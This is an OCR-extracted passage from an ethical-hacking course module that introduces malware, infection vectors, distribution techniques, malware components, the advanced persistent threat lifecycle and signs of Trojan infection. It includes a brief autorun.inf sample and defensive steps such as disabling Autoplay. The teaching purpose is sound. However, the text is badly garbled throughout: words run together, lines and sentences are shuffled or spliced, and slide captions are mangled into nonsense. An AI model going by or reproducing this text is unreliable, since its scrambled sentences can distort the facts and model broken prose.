of the basicconcepts
of malware.Thissection
describesmalwareand highlights the common techniques usedbyattackersto distribute
malwareon theweb.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Introductionto Malware

s malware
{©Malware malicious

forthe
ofthesystems
to the
thatdamages
software
crestor
or dlsables
purpose
computer and
systems
oftheftor fraud gives
limitedo ull contol

Examples
of Malware

trojan awareBD vomars

Dacdeors BD) cry

Ransomware

Introduction to Malware
Malwareis malicioussoftwarethat damages or disables
computer
systems andgives limitedor

adware,
of
fullcontrol the systemsto themalware
Malwareincludesviruses,worms, Trojans,
scareware, crapware,roughware,
creatorformalicious

crypters,
activitiessuchas theftor fraud.
rootkits,backdoors,
botnets, ransomware, spyware,
etc. Thesemay delete files,
keyloggers,
slowdowncomputers, stealpersonalinformation,sendspam,or commit fraud.Malwarecan
perform
variousmaliciousactivities rangingfrom simple
emailadvertising
to complex
identity
theft andpassword
stealing,
Malwareprogrammers develop
anduse malwareto:
+
Attackbrowsers
andtrackwebsitesvisited
+
anddegrade
Slowdownsystems performance
system
*
Causehardwarefailure,
rendering inoperable
computers
+
stealpersonal
information,
including
contacts
Erasevaluableinformation,
resulting
i n substantial
dataloss
Attackadditional
computer
inboxeswithadvertising
‘Spam
directly
systems
emails
froma compromised
system

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DifferentWays
for Malwareto Enter a System

roraletarimnemdaenotiedeses
|| tra atacrnens

Unused ses andeeware webapplations/

DifferentWays
for Malware to Entera System
InstantMessenger
Applications
applications
Infectioncan occur via instant messenger suchas FacebookMessenger,
WhatsApp Messenger, LinkedinMessenger,
Google
Hangouts, Usersare at high
or ICQ.

whereit is sent,thereis always

Regardless
riskwhile receivingfilesvia instant messengers.
a riskof infection
of
who
sendsthefile
The user can never be
bya Trojan.
or from

100%sure of
example, who is at the other end
if you receive a file through
person suchas Bob,
of the connection at any particular
an instant messenger application
moment. For
froma known
you will tryto open andview the file. Thiscouldbe a trick whereby
an attacker whohashacked Bob'smessenger ID andpassword wants to spread Trojans
across Bob'scontactslistto trapmore victims.
PortableHardwareMedia/Removable
Devices
© Portablehardwaremediasuchas flashdrives, CDs/DVDs, andexternalharddrives
canalso injectmalwareinto a system. A simpleway of injectingmalwareinto the
targetsystemis through physicalaccess. For example, if Bob can access Alice’s
systemin her absence, then he can installa Trojan
bycopyingthe Trojan software
fromhisflashdrive onto herharddrive.
‘Another
means of portable media malwareinfectionis through the Autorun
or Autostart,
function.Autorun,alsoreferredto as Autoplay is aWindowsfeature
that,if enabled,
runs an executableprogramwhen a user inserts a CD/DVD i n the
DVD-ROM trayor connects a USBdevice.Attackerscan exploitthisfeatureto run
malwarealong with genuineprograms.They placea n Autorun.inffile with the
malwarein a CD/DVDUSB
ordevice andtrick people
or it
into inserting plugging into

ical andCountermensores
Mackin ©by E-Comel
Copyright
 their systems. Becausemany people are not aware of the risksinvolved, their
machinesa re vulnerableto Autorun malware,The followingis the content of an
inffile
‘Autorun
[autorun)
openssetup.exe
icon=setup.exe
To mitigatesuch infection, turn off the Autostart functionality.
Follow the
instructions belowto turn offAutoplay i n Windows
10:
1, ClickStart. Type
2. If you are prompted
in
gpedit.msctheStartSearchbox,andthen
for an administratorpassword
press
ENTER.
or confirmation,
typethe
password, or click
Allow.
UnderComputer Configuration,expand Templates,
Administrative expand
WindowsComponents,
andthenclickAutoplay
Poli
In the Detailspane,double-click
ClickEnabled,
Turn
off
Autoplay.
andthen selectAll drivesi n theTurnoffAutoplay
boxto disable
on
‘Autorunall drives.
6. Restart the computer.
BrowserandEmailSoftware
Bugs
Outdatedweb browsers oftencontain vulnerabilitiesthat can posea majorriskto the
A visit to a malicioussite fromsuchbrowsersc an automatically
user'scomputer. infect
themachinewithoutdownloading or executing anyprogram.Thesamescenario occurs
while checking
e-mailwith OutlookExpress
or some other softwarewith well-known
problems.Again,it may infectthe user'ssystemwithout even downloading an
attachment.Toreducesuchrisks,always
use the latestversion of the browserand e-
mailsoftware.
InsecurePatchmanagement
Unpatched
softwareposesa highrisk.UsersandIT administrators
do not update
their
application and manyattackerstake advantage
softwareas often as theyshould, of this
well-knownfact. Attackerscan exploitinsecure patchmanagement byinjectingthe
softwarewith malwarethat can damage the datastoredon the company’s
systems. This
process breaches,
c an leadto extensive security ofconfidential
suchas stealing filesand
company credentials.Someapplications that were found to be vulnerableand were
patched
1083),
recently includeMicrosoft
Microsoft Exchange
{CVE-2019-1118), Docker
Office(CVE-2019-1084),
Server(CVE-2019-1136), .NET
Framework
Microsoft Graphics
flaw i n Azure(CVE-2018-15664), Microsoft
(CVE-2019-
Component
SQLServerRCE
(CVE-2019-1068), andRDPRCE(CVE-2019-0887). Patchmanagement must be effective
in threats,andit
mitigating is vital to andregularly
applypatches updatesoftware
programs.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Rogue/Decoy
Applications
Attackerscan easily lure a victim into downloadingfree applications/programs.
Ifa free
programclaimsto be loadedwith featuressuchas a n addressbook,access to several
POP3accounts,and other functions, manyusers will be tempted
to try it. POP3 (Post
OfficeProtocolversion 3)is an emailtransferprotocol.
© If a victim downloads freeprogramsandlabelsthem as TRUSTED, protection
softwaresuchas antivirus softwarewill fal to indicatethe use of new software.In
this situation, an attackerreceives an email,POP3account passwords, cached
passwords, andkeystrokesthrough emailwithout being noticed.
Considera n example
Attackersthrive on creativity. i n whichan attackercreates a
fakewebsite(say, Audiogalaxy) fordownloading MP3s.He or shecouldgenerate
sucha site using 15 GBof space for the MP3sand installing any other systems

to
neededcreate the illusionof a website,
are merelydownloading
asa backdoor
Thiscan foolusers into thinking
fromothernetworkusers. However,
andinfectthousands
of naive users.
thatthey
thesoftwarecouldact

‘Somewebsiteseven linkto anti-Trojan

software, thereby fooling users into trusting
themanddownloading infectedfreeware.Includedi n the setupis a readme.txtfile
that can deceive almostany user. Therefore, any freeware site requiresproper
attention beforeany softwareis downloadedfromit.
Webmasters of well-knownsecurity portals, who have access to vast archives
containing various hacking programs, shouldact responsibly with regard to the files
theyprovide and scan them often with antivirus and anti-Trojan softwareto
guarantee that their site is freeof Trojans and viruses. Suppose that an attacker
submitsa programinfectedwith a Trojan (e.g.,a UDPflooder) to an archive’s
‘webmaster.If the webmaster is not alert,the attacker mayuse thisopportunity to
Infectthe fileson the site with the Trojan.Userswhodealwith any softwareor web
application shouldscan theirsystems daily.If theydetectanynew file,itis essential
to examine it. If any suspicionarises regarding the file,itis alsoimportant to forward
it to softwaredetection labsfor furtheranalysis.
© Its easyto infectmachines
usingfreeware;
thus,extra precautions
are necessary.
UntrustedSitesandFreeWebApplications/Software
websitecouldbe suspiciousif itis locatedat a freewebsiteprovider
‘A or one offering
programsforillegal activities.
© tis highlyriskyto downloadprogramsor toolslocatedon “underground―sites,e..,
Neurotickat software, becausetheycan serve as a conduitfor a Trojan attackon
targetcomputers. Usersmust assessthe highrisk of visitingsuchsites before
browsing
them,
Manymaliciouswebsiteshave a professional look,massive archives, feedback
forums,
and linksto other popular
sites. Usersshouldscan the files usingantivirus

ical andCountermensores
Mackin ©by E-Comel
Copyright
 software
beforedownloading a websitelooksprofessional
them,Justbecause does
not mean that itis safe.
> Always downloadpopular softwarefrom its original (orofficially
dedicatedmirror)
siteswith linksto the (supposedly)
site,andnot fromthird-party samesoftware.

Downloading Filesfromthe Internet

Trojans systemwhenusers downloadInternet-drivenapplications
enter a suchas music
files,movies, games,greeting
players, andscreensaversfrommaliciouswebsites,
cards,
thinking
that theyare legitimate.
MicrosoftWord and Excelmacros are alsoused
effectively
to transfermalware,
anddownloaded maliciousMS Word/Excel filescan
infectsystems. Malwarecan alsobe embeddedi n audio/video
files as well as in video
subtitlefiles.
EmailAttachments
‘An
attachmentto e-mailis the most common mediumto transmit malware.The
an
attachment
can bei n
into clicking any
form,
and downloading
audiofile,video file,brochure,
andtheattackerusesinnovative ideasto trickthevictim
the attachment.Theattachmentmaybe a document,
invoice, lotteryofferletter,jobofferletter,loanapproval
letter,
admission form,contract approval, etc.
Example
1:A user'sfriend is conducting
some research,
andthe user wouldlike to know
more aboutthefriend’s research topic.Theuser sends a n e-mailto thefriendto inquire
about the topicand waits for a reply. An attackertargeting the user alsoknowsthe
friend’s
e-mailaddress. Theattacker will merely codea programto falsely populate the
field andattacha Trojan
e-mail“From:― i n the email.Theuser will checkthe emailand
think that the friendhas answeredthe query i n an attachment, download the
attachment, and run it without thinkingit might bea Trojan, resultingin an infection.
Someemail clients, suchas OutlookExpress,have bugs that automatically
execute
attachedfiles.Toavoidsuchattacks,
usesecure emailservices,investigate
theheaders
of emailswith attachments,confirmthe sender'semail address,and downloadthe
onlyifthesenderis legitimate,
attachment
NetworkPropagation
Networksecurity i s the first line of defensefor protecting informationsystems from
hacking incidents.However,various factorssuch as the replacement of network
firewallsandmistakes of operators maysometimesallowunfilteredInternettraffic into
privatenetworks,Malwareoperators continuously attemptconnections to addresses
within the Internet addressrange owned by targetsto seek an opportunityfor
unfettered access. Somemalwarepropagates throughtechnological networks.For
example, the Blasterstarts froma localmachine'sIP address or a completely random
addressand attemptsto infectsequential IP addresses. Although networkpropagation
attacksthat take advantage of vulnerabilitiesi n common networkprotocols (e.g.,
SQL
Slammer) havenot beenprevalent recently,
the potentialfor suchattacksstill exists.

ical andCountermensores
Mackin ©by E-Comel
Copyright
FileSharing.
If NetBIOS(Port139),FTP(Port 21),SMB(Port145),etc.,o n a systemare openfor file
sharingor remote execution, they
can be usedbyothersto
allowattackersto installmalwareandmodify files.
system access
the system.
Thiscan

Attackerscan alsouse a DoSattackto shutdownthe system andforcea reboot so that

can restart itselfimmediately.
the Trojan To preventsuchattacks, ensure that the file
sharingpropertyis disabled,To disablethe file sharing option,clickStart and type
ControlPanel.Then, i n the results,clickon the ControlPaneloption and navigate to
Networkand Internet > Networkand Sharing Center-> Change AdvancedSharing
Settings.
Selecta network profile andunderFileandPrinterSharing section,selectTurn
off
file andprintersharing,
InstallationbyotherMalware
Thiswill preventfile sharing
abuse.

A pieceof malwarethat can commandandcontrolwill often beable to re-connect to

themalwareoperator's site usingcommon browsingprotocols. Thisfunctionality
allows
malwareon the internalnetwork to receive both softwareand commands from the
outside.In suchcases,the malwareinstalledon one system drivesthe installation
of
othermalwareon the network, thereby
causingdamage to the network.
BluetoothandWirelessNetworks
Attackers
use openBluetooth
andWi-Finetworksto attract users to connect to them,
Theseopen networkshavesoftwareandhardwaredevicesinstalledat the router level
to capture the networktrafficanddatapackets
as well as to findthe account detailsof
the users,including
usernames andpasswords.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 CommonTechniques
AttackersUse to Distribute Malware
on the Web

esina
Search
| Ee hgh
malwarepages
nankng searchresus

Matvrtsing Embedding
matwaein ad-networkshat dsl aot hundredso f gina, ih-traf tes

| Explating
oftware
malware
Drive-byDownloads
jst fw in bowser tonal by vestingweb
pe

CommonTechniques
AttackersUseto Distribute Malware on the Web
Source:Security (http://www.sophos.com)
ThreatReport
Somestandardtechniques
usedto distributemalwareon the webare as follows
=

SEO) hat
Black Search Engine
uses aggressive
pageswapping,andadding
Optimization
(SEO): Blackhat SEO(also
SEOtactics suchas keyword
unrelatedkeywords
stuffing,
to get higher
referredto as unethical
doorway
inserting pages,
searchenginerankingsfor
malwarepages.
SocialEngineered Click-jacking:
Attackersinjectmalwareinto websitesthat appear
legitimate
into
to trick users clicking
link executes withoutthe knowledge
them.Whenclicked, the malwareembeddedin the
of
or consent the user.

Spear-phishing is usedfor mimicking

Sites:Thistechnique legitimate
institutions,such
as banks,
to steal passwords,
creditcardand bank account data,and other sensitive
information,
‘Malvertising:
This technique
involvesembedding
malware-ladenadvertisementsi n
legitimate channelsto spread
online advertising malwareon systemsof unsuspecting
users,

Compromised
LegitimateWebsites:Often,attackersuse compromised
websitesto
infectsystems
with malware.Whenan unsuspecting
user visits the compromised
he/she
website, installsthe malwareo n his/her
unknowingly after whichthe
system,
malwareperforms
malicious
activities.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Drive-by Thisrefersto the unintentionaldownloading
Downloads: of softwarevia the
Internet. Here, an attackerexploits flaws i n browsersoftwareto install malwareby
merely visitinga website.
‘Spam
Emails:Theattackerattachesa maliciousfile to an emailandsendsthe emailto
multiple targetaddresses. Thevictim is tricked into clickingthe attachmentandthus
executes the malware, therebycompromising his/hermachine.Thistechnique is the
most common methodcurrently i n use byattackers. In additionto emailattachments,
an attacker
mayalsouse theemail
to
body embedthemalware.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of Malware
Components
3
software
malware
requirement
mahwae
depend
designe
on the
specie ofthe authorwho it fora

of Malware
Components
Malwareauthorsandattackerscreate malwareusingcomponents that can helpthemachieve
their goals.
They deletedata,change
c an use malwareto steal information, systemsettings,
provide or merely
access, and occupyspace.Malwareis capable
multiply of propagating
and
functioning secretly.
Someessential of most malwareprograms
components are as follows:
*
It is a softwareprogramthat can concealthe existence of malware.Attackers
Crypter:
use this software to elude antivirus detection.It protectsmalwarefrom reverse
engineeringor analysis, thusmaking it dificult to detectbysecuritymechanisms.
Downloader:It is a typeof Trojan that downloadsother malware(or)maliciouscode
and filesfrom the Internet to a PCor device.Usually, attackersinstall a downloader
whentheyfirst gainaccess to a system.
Dropper: It is a covert carrier of malware.Attackersembednotorious malwarefiles
insidedroppers, whichcan perform the installationtaskcovertly. Attackersneedto first
installthe malwareprogramor codeon the system to executethe dropper. Thedropper
can transport malwarecodeand execute malwareon a targetsystemwithout being
detectedbyantivirus scanners
Exploit:
It is the partthe malwarethat contains codeor a sequenceof commands
that
can take advantage
of a bugor vulnerability
in a digital or device.Attackersuse
system
suchcode to breachthe system's securitythrough
softwarevulnerabilitiesto spy on
information
or to installmalware.Basedon the typeof vulnerabilitiesabused,
exploits
are categorized
into localexploits
andremote exploits.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Injector:Thisprograminjectsexploitsor maliciouscodeavailable
i n the malwareinto
other vulnerablerunning processesand changes the methodof execution to hide or
preventits removal.
Obfuscator: It is a programthat conceals the maliciouscodeof malwarevia various
techniques, thusmaking it difficultfor security
mechanisms to detector remove it.
Packer:Thissoftwarecompressesthe malwarefile to convert the codeanddataof the
malwareinto an unreadableformat. It uses compressiontechniques to packthe
malware.
Payload:Itis the partof the malwarethat performs the desiredactivity
whenactivated
It may be usedfor deleting or modifying files,degrading the systemperformance,
ports,changing
‘opening settings,etc.,to compromise system security.
a pieceof codethat definesthe basicfunctionality
Malicious Code:This is of the
malwareand comprises
commandsthat result in security
breaches.It can take the
following
forms:
©
Java
Applets
ActivexControls
© BrowserPlug-ins
© PushedContent

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

@ Marware concpis Fietose Malware

Concopts
e MalwareAnalysis

©Fetanconcepts Ceuntroeatsres

e Virus and
Worm
Concepts Anti-MalwareSoftware

APT Concepts
Advanced as they
persistentthreatsare a major securityconcern for any organization,
representthreats to the organization’s
assets,resources, financial records,
and other
data.APT attackscan damage
confidential the reputation byrevealing
of an organization
sensitive data,Thissectiondiscusses andlifecycle.
APTsas well as their characteristics

ical andCountermensores
Mackin ©by E-Comel
Copyright
 What are AdvancedPersistentThreats?

(©Advanced threats
persistent (APT)
ae defined
2s
2typeof
network
attacker
gain
attack,where
an unauthorized

(©.
Themain
objectivebehind
these
attackito obtalnsenkive
the
information
ratherthansabotagingorganization

‘What
are AdvancedPersistentThreats?
‘An threat is definedas a typeof networkattackwhereby
advancedpersistent an attackergains
unauthorized
accessto a target networkandremains i n thenetworkwithoutbeingdetected for
a longtime. Theword “advanced―
signifies
the use of techniques
to exploit
the underlying
vulnerabilities
(C&C)
The word“persistent―
in the system.
systemthat continuously
signifies
“threat―
signifies
theexternalcommand-and-control
extracts the dataand monitors the victim'snetwork.Theword
humaninvolvementi n coordination.APT attacksare highly sophisticated
attackswhereby an attackeruses well-craftedmaliciouscode along with a combinationof
multiple zero-day exploitsto gain access to the targetnetwork.Theseattacksinvolvewell
planned and coordinatedtechniques whereby attackerserase evidenceof their malicious
activities after their objectiveshave been fulfilled. APT attacksare usuallyperformed on
organizations possessing valuable information, such as financial, defenseand
healthcare,
aerospace,manufacturing, andbusiness Themain objective
organizations. of theseattacksis to
obtainsensitive information ratherthansabotaging theorganization
andits network.
Informationobtainedbyan attackerthrough
APTattacksincludes:
Classified documents =
Transaction
information
User

credentials card "Credit information

‘=

or
Employee's
information personal
customer's Organization's =

information
business
strategy

Networkinformation Controlsystem
access information

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Characteristicsof Advanced PersistentThreats

Conjecties | obtaining
sense
ntermation
rei
oui pail gots

RineTa
upto
which
aftack
remains
undetected
inthe
tartevel the network

Characteristicsof Advanced PersistentThreats(Cont'd)

(OS) aon

Specite
Warning Signs eraser ane pad asl atone ety ee

Characteristicsof AdvancedPersistentThreats
APTS basedon whichattackerscan design
havevarious characteristics andplantheir activities
to launchan attack.According
successfully to security Dr. Max Kilger,
SeanBodmer,
researchers
JadeJones,
andGregory
Carpenter, characteristics
some key ofAPTSare as follows:

ical andCountermensores
Mackin ©by E-Comel
Copyright
Objectives
The main objective of any APTattackis to repeatedly
obtain sensitive informationby
gainingaccess to the organization's
networkfor illegal
earnings.Anotherobjective of an
APTmaybe spyingfor political goals.
or strategic
Timeliness
It refers to the time taken by an attackerfrom assessingthe targetsystemfor
vulnerabilities
Resources
to exploiting
to
themto gainandmaintain access the targetsystem,

It is definedas the amount of knowledge,

tools,
andtechniques
required
to perform
an
attack.APTattacksare more sophisticated
attacksperformed
byhighly
skilledcyber
criminals,andtheyrequire considerable
resources.

RiskTolerance
It is definedas the level up to whichthe attackremains undetected i n the target
network.APTattacksare well planned and executedwith proper knowledge of the
target network,whichhelps
SkillsandMethods
themremain undetected for long
i n the network
a time.
Theseare the methodsand toolsused byattackersto perform a certain attack.The
methodsusedfor performingthe attackincludevarious socialengineeringtechniques to
gatherinformationabout the target,techniques to preventdetection by security
mechanisms,andtechniquesto maintain access for a long
time.
Actions
APTattacksfollowa certain numberof technical “actions―
that makethem different
fromothertypesof cyber-attacks.Themain objective
of suchattacksis to maintain their
presence networkfora long
i n the victim's time andextract as muchdataas possible.
AttackOrigination
Points
They
refer
numerous
to the attemptsmadeto gain entryinto the targetnetwork.Such
pointsofentrycan beusedto gainaccessto thenetworkandlaunch furtherattacks.
To
succeedi n gaining initial access,the attackerneedsto conductexhaustiveresearchto
identify
and functions
thevulnerabilities gatekeeper i n thetargetnetwork.
Numbers
Involvedin theAttack
It Is definedas the numberof host systems
involvedin the attack.APTattacksare
performed
usually bya crime groupor crime organization.
Knowledge
Source
It is definedas the gathering
of informationthrough online sources about specific
threats,whichcan befurtherexploited
to performcertain attacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Multi-phased
Oneof the importantcharacteristics of APTsis that theyfollow multiple
phasesto
execute an attack.The phases
followed byan APT attackare reconnaissance,access,
discovery, anddataexfiltration
capture,
Tailoredto the Vulnerabilities
Themaliciouscodeusedto execute APT attacksis designed and written suchthat it
vulnerabilities
targetsthe specific in the victim’s
present network.
‘Multiple
Pointsof Entries
Oncea n adversary network,
enters the target he/sheestablishes a connection with the
server to downloadmaliciouscodeforfurtherattacks. In the initialphase of an APT
attack, the adversary
creates multiple
pointsof entrythrough the server to maintain
accesstothe targetnetwork.If one pointof entryis discovered andpatched
bythe
analyst,
security thenthe adversarycan use a differententrypoint.

EvadingSignature-BasedDetectionSystems
APT attacks relatedto zero-day
a re closely exploits,
whichcontain malwarethat has
never been previously
discoveredor deployed. Thus,APTattackscan easilybypass
securitymechanisms suchas firewalls,
antivirus software,
IDS/IPS,
and email spam
filters
Specific
Warning
Signs
APT attacksare usuallyimpossibleto detect.However, some indicationsof an attack
include inexplicable
user account activities,the presenceof a backdoorTrojan for
maintainingaccess to the network, unusualfile transfersand file uploads,unusual
database
activities, etc

ical andCountermensores
Mackin ©by E-Comel
Copyright
 AdvancedPersistentThreatLifecycle

AdvancedPersistentThreat Lifecycle
In thecurrentthreat landscape,organizationsneedto pay greater attention to APTs.APTsmay
targeta n organization’s
IT assets, financialassets,intellectualproperty, and reputation.
Commonly used securityand defensivecontrolswill not sufficeto preventsuchattacks.
Attackers behindsuchattacks adapttheirTTPsbased o n the vulnerabilities
andsecurityposture
Thus,theycan evadethe security
of the targetorganization. controlsof the targetorganization.
To launchan APTattack, attackersfollow a certain set of phases and
to target,penetrate,
exploit an organization's
network.Attackers must followeachphase stepbystepto successfully
compromiseandgain access to the targetsystem.
various phases
‘The of the APTlifecycle
are as follows:

1. Prepars
The first phase of the APTlifecycle where an adversary
is preparation, definesthe
target,performs extensive researchon the target,organizes a team,buildsor attains
tools,andperforms tests for detection.APTattacksusually require a highlevel of
preparation,as the adversary cannot riskdetectionbythe target’s
network security.
Additionalresources anddata may be necessarybeforecarryingout the attack.An
attackerneedsto perform highlycomplex beforeexecuting
operations the attackplan
againstthe target
Initial Intrusion
organization.
Thenext phase involvesattempting to enter the targetnetwork.Commontechniques
used for an initial intrusion are sending spear-phishing
emails and exploiting
vulnerabilitieson publicly available servers. Spear-phishing
emails usually
appear
legitimate but theycontain maliciouslinks or attachmentscontaining executable

ical andCountermensores
Mackin ©by E-Comel
Copyright
 malware, Thesemaliciouslinkscan redirect
thetargetto thewebsitewherethe target's
web browserand softwareare compromised bythe attackerusingvarious exploit
techniques.Sometimes, an attacker may alsouse socialengineeringtechniques to
gatherinformationfrom the target.After obtaining informationfrom the target,
attackersuse suchinformationto launchfurtherattackson the targetnetwork.In this
phase,maliciouscode or malwareis deployed into the targetsystemto initiate an
‘outbound
connection,
.
Expansion
The primaryobjectives
of this phase
are expanding
accessto the targetnetworkand
obtaining
credentials.If the attacker'sai m is to exploit
and gain access to a single
system,thenthereis no needfor expansion.However,
in most cases,the objective
of an
systemsusinga single
attacker is to access multiple compromised system.In this
scenario, the first stepperformedbyan attackerafter an initialcompromiseis to
expand
access to the target Themain objective
systems. of the attackeri n this phase
is
to obtain administrativelogincredentials to escalateprivileges andto gain further
access to the systems i n the network. For this purpose, the attackertries to obtain
privileges
administrative forthe initial targetsystemfromcached credentialsanduses
thesecredentialsto gain and maintain access to other systems i n the network.When
attackers
are unable to obtainvalidcredentials,theyu se othertechniques suchas social
engineering, exploiting
vulnerabilities,
and distributing
infectedUSBdevices.After the
attackerobtainsthe target’s
account credentials,it is difficultto track his/her
movement in the network,as he/she
uses a legitimate
username andpassword.

Thisexpansionphase supportsother phases of the APT lifecycle.

In the searchand
exfiltrationphase, the attackercan obtain the targetdata bygainingaccess to the
systems.Attackers identifysystemsthat can be used for installing persistence
mechanisms and identify
appropriate systernsi n the network
that can be leveraged
to
exfiltratedata,
. Persistence
Thisphase
involvesmaintaining
access to the targetsystem,startingfromevading
endpoint
securitydevicessuchas IDSand firewalls,
enteringinto the network,
and
establishing
access
to the system,
until thereis
To maintain access to the targetsystem,attackers
no further use of the data andassets.
follow certain techniques or
procedures, whichinclude use of customizedmalwareand repackaging tools.These
tools are designed suchthat theycannot be detected bythe antivirus softwareor
securitytoolsof the target.To maintain persistence,
attackersuse customized malware
thatincludesservices,executables,anddriversinstalledo n various systems i n the target
network.Another way to maintain persistence is finding locationsfor installing the
malwarethat are not frequently examined.Theselocationsinclude routers, servers,
firewalls,
printers,
ete.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 and
5. Search Exfiltration
In this phase,an attackerachieves the ultimategoalof networkexploitation, whichis
generallyto gainaccess to a resource that can beusedfor performing furtherattacksor
usingthat resource for financialgain. In general, attackerstargetspecificdata or
documentsbefore launching an attack.However, i n some cases, althoughattackers

including
data
determinethatcrucial are availablein the targetnetwork,

importantdocuments, emails,shared
ofthe
theyare unaware
locationof thedata. Acommon methodfor searchandexfiltrationis to stealallthe data
drives,and othertypesof datapresent
o n the target network. Data can also be gathered usingautomatedtools suchas
network sniffers.Attackersuse encryption techniques to evadedatalossprevention
{DLP) technologiesi n the targetnetwork.

-
Cleanup
Thisis thelast phase,
wherean attackerperforms
certain actionsto preventdetection
and remove evidenceof compromise. Techniques usedbythe attackerto cover his/her
tracksincludeevadingdetection, eliminating
evidence andhiding
of intrusion, the target
of the attack and attackerdetails.In some cases, these techniques also include
manipulatingthe datai n the target analysts.
environment to misleadsecurity
It forattackers
is imperative makethe systemappearas it was beforetheygained
to
access the network.Therefore,
to it and compromised it is essentialfor an attackerto
cover bysecurity
tracksandremain undetected
his/her analysts. can change
Attackers
any file attributesbackto their original
state. Informationlisted,
suchas file size and
date,isjustattributeinformation
containedi n thefile.
Cleanup

Searchand Exfiltration

Initial Intrusion
Persistence Deployment of

—
Expansion

Figure
71:
Advanced
Persistent
Threat
Lifecycle
ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

‘Malware
ConceptsFiloloss MalwareConcepts

MalwareAnalysis

‘Trojan
Concepts Countermeasures

Virus and
Worm
Concepts Anti-MalwareSoftware

TrojanConcepts
the basic
In this section,w e will discuss of Trojans
concepts to understandvarious Trojans
and
backdoorsas well as their impacton networkand systemresources. Thissection describes
and
Trojans
various highlights
methodsadopted
maliciousactivities.
their purpose,symptoms, and common portsused.It alsodiscusses
byattackersto installTrojans
the
and perform
to infecttargetsystems

Thissection alsodescribesvarious typesofTrojans. Everyday,attackersdiscoveror create new

Trojansdesigned to discovervulnerabilitiesof target Trojansare categorized
systems. bythe
waythey
and
enter systems the
types
actions systems.
of theyperform
on these

ical andCountermensores
Mackin ©by E-Comel
Copyright
 What is a Trojan?

getactvted when wser

“Trojns
Sn can cause immense
aperforms
certain
damage
tothe systems
actionsanduponaction.
predefined can

ssabling
of
Indeations
ofa Tojn attacki ncludeabnormal andnetwork
system activitess uch
antrus andredirection
to unknown pages

fortransfering
sensitivedata

Whatis a Trojan?
According
to ancient Greekmythology,
the Greekswon the Trojan
Warwith the aid of a giant
woodenhorsethat was builtto hidetheirsoldiers.TheGreeks left thishorsei n frontof the
of
gates Troy.TheTrojans
left beforeapparently
thought
withdrawing
that the horsewas a giftfromthe Greeks,
fromthe war and brought
Greeksoldiersbrokeout of thewoodenhorseandopened
whichtheyhad
it into theircity.At night, the
the citygatesto let in the rest of the
Greekarmy,who eventually
destroyed
the cityof Troy.
bythisstory,a computer
Inspired is a programin whichmalicious
Trojan or harmfulcode is
containedinsidean apparently
harmlessprogram or data,whichcan later gain controland
cause damage,suchas ruining the file allocationtable on your harddisk.Attackersu se
computer Trojans
to trickthe victim into performing
a predefined
action. Trojans
are activated
uponusers’ predefined
specific actions suchas unintentionally
installing
a malicioussoftware,
clicking
on a maliciouslink,etc., and upon activation,
theycan grantattackersunrestricted
access to all the datastoredon the compromised informationsystem and causepotentially
severe damage. Forexample,userscoulddownloada filethat appears
to be a movie, but,when
executed, unleashesa dangerous programthat erases the hard drive or sendscredit card
numbersandpasswords to theattacker,
ATrojanis wrappedwithinor attachedto a legitimateprogram,meaningthat the programmay
havefunctionality
that is not apparent to the user. Furthermore, attackers
u se victims as
unwittingintermediariesto attackothers.Theyc an use a victim'scomputerto commit illegal
DoSattacks.

Trojans
transmit information,
programsthat provide
as thevictims. Forexample,
workat thesame levelofprivileges
to deletefiles, modify a
if victim hasprivileges
existingfiles,and installother programs (such
unauthorizednetworkaccessandexecute privilege
elevationattacks),
as

ical andCountermensores
Mackin ©by E-Comel
Copyright
once infectsthat system,it will possess
the Trojan the same privileges. Furthermore, it can
attemptto exploit vulnerabilitiesto increase the levelof access even beyond the user running
it, f successful,
theTrojan can use suchincreased privilegesto installothermaliciouscodeon
the
victim’s
‘A
machine.
compromised systemcan affect other systems o n the network. Systems that transmit
authenticationcredentialssuchas passwordsover sharednetworksi n cleartext or a trivially
encrypted
form are particularly
vulnerable.If an intruder compromises
a systemon sucha
he or shemay be ableto recordusernames and passwords
network, or other sensitive
information.
Additionally,
a Trojan, depending on the actions it performs,
mayfalsely implicatea remote
systemas the source of an attackbyspoofing, therebycausingthe remote systemto incur a
liability. enter the system
Trojans
messages.
bymeans suchas email
attachments,
downloads, and instant

Indicationsof Trojan
Attack
Thefollowing
‘=
computermalfunctions
are indications
of Trojan
TheDVD-ROMdraweropensandclosesautomatically
a
attack:

=
flipsupside-down,
Thecomputerscreen blinks, or is invertedso that everything
is
displayed
backward.
The default background or wallpaper change
settings automatically.This can be
performed either on the user’s
usingpictures or in the attacker's
computer program.
Printersautomatically
start printingdocuments.
Webpagessuddenly open without inputfromthe user.
Thecolorsettings
of the operatingsystem (0S)
change automatically
convert to a personal
Screensavers scrolling
message.
Thesoundvolumesuddenly
fluctuates.
Antivirusprograms are automatically
disabled,
andthe data are corrupted,
altered,
or
deletedfromthesystem,
Thedateandtime of the computer
change.
Themousecursor moves byitself.
Theleft-andright-click
functionsof themouse are interchanged.
Themouse pointer completely.
disappears
Themouse pointerautomatically
clicks
o n icons andis uncontrollable.
TheWindowsStartbuttondisappears.
Pop-ups
with bizarremessages suddenly appear.
Clipboard
images and text appear to be manipulated,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Thekeyboard
andmouse freeze.
Contactsreceive emailsfroma user'semailaddressthatthe user did not send.
Strange
warnings boxesappear. Often, these are personal
or question messages
at theuser, asking
directed to answer byclicking
that requirehim/her
questions a Yes,
No,
or
OK
Thesystem
button.
turns off andrestarts i n unusualways.
disappears
Thetaskbar automatically
TheTaskManageris disabled.
Theattackeror Trojan
may disablethe TaskManager
functionso that the victim cannot view the tasklist or endthe taskon a givenprogram
or process.

72:
Figure
Oingram
showing
the
attacker
extracts
the
how information from vit sytem

ical andCountermensores
Mackin ©by E-Comel
Copyright
 HowHackersUseTrojans

Dette
(©
orepiace
operrtingrewals
ciel stem les able ad antvins

Use end
{©
basting
ema
victor spamming

ts
(@Encrypt kta vck
one
ncce

How HackersUseTrojans
